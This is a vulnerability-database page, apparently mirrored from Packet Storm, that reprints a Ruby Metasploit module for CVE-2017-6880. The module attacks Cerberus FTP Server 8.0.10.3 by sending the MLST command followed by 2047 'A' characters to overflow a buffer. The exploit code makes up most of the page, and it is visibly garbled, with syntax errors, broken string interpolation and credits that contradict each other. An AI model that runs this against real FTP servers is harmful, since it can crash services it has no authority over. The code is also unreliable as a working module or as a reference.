Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSouhardya SardarPACKETSTORM:142502
HistoryMay 15, 2017 - 12:00 a.m.

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

2017-05-1500:00:00
Souhardya Sardar
packetstormsecurity.com
29

0.042 Low

EPSS

Percentile

92.3%

JSON
`#!/usr/share/ruby  
  
#[+] Title: Cerberus FTP Server 8.0.10.3 a 'MLST' Remote Buffer Overflow  
#[+] Credits / Discovery: Nassim Asrir  
#[+] Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/  
#[+] Metasploit Module Author : Souhardya Sardar   
#[+] Metasploit Module Author Contact: github.com/Souhardya | [email protected]  
#[+] Author Company: Henceforth  
#[+] CVE: CVE-2017-6880  
  
#Vendor:  
#===============  
#   
#https://www.cerberusftp.com/  
  
  
#Download:  
#===========  
#   
#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)  
  
  
#Vulnerability Type:  
#===================  
#   
#Remote Buffer Overflow.  
  
  
  
# ----------------------------  
# Module Dependencies/requires  
# ----------------------------  
  
require 'msf/core'  
  
# ----------------------------------  
# Metasploit Class name and includes  
# ----------------------------------  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::Ftp  
  
# -----------------------------------------  
# Initialize information  
# -----------------------------------------  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Cerber FTP Remote Buffer Overflow ',  
'Description' => %q{  
This module exploits a buffer overflow in the Cerber FTP client that is triggered  
by sending a bad char "A" in the command "MLST" (2047) .  
},  
  
'Author' =>  
[  
'Module Author And Bug Discovered by : Peter Baris',   
'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :)  
'Thanks to : Nidhish Pandya ', #auditing:)  
  
  
],  
'License' => NONE,  
'Platform' => ['win']  
  
'References' =>  
[  
[ 'CVE', 'CVE-2017-6880' ],  
[ Reference code taken from original POC located here :- https://www.exploit-db.com/exploits/41620/ ]   
  
]))  
  
register_optionsOptPort.new('SRVPORT', [true, "The remote FTP server port", 21])  
], self.class)  
deregister_options('FTPUSER', 'FTPPASS')  
end  
  
def exploit  
connect  
  
payload = "A"*2047  
  
print_status("Trying to connect to target server {target.name...")  
  
  
sock.put('MLST ' + payload + '\r\n')  
  
handler  
disconnect  
end  
  
end  
`

Related

nvd 1
exploitpack 1
zdt 1
prion 1
cve 1
cvelist 1
exploitdb 1
nvd
nvd
CVE-2017-6880
2017-03-17 17:59:00
exploitpack
exploitpack
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)
2017-03-16 00:00:00
zdt
zdt
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow Vulnerability
2017-03-17 00:00:00
prion
prion
Buffer overflow
2017-03-17 17:59:00
cve
cve
CVE-2017-6880
2017-03-17 17:59:00
cvelist
cvelist
CVE-2017-6880
2017-03-17 17:00:00
exploitdb
exploitdb
Cerberus FTP Server 8.0.10.3 - &#039;MLST&#039; Buffer Overflow (PoC)
2017-03-16 00:00:00

0.042 Low

EPSS

Percentile

92.3%

JSON
Related for PACKETSTORM:142502
nvd1exploitpack1zdt1prion1cve1cvelist1exploitdb1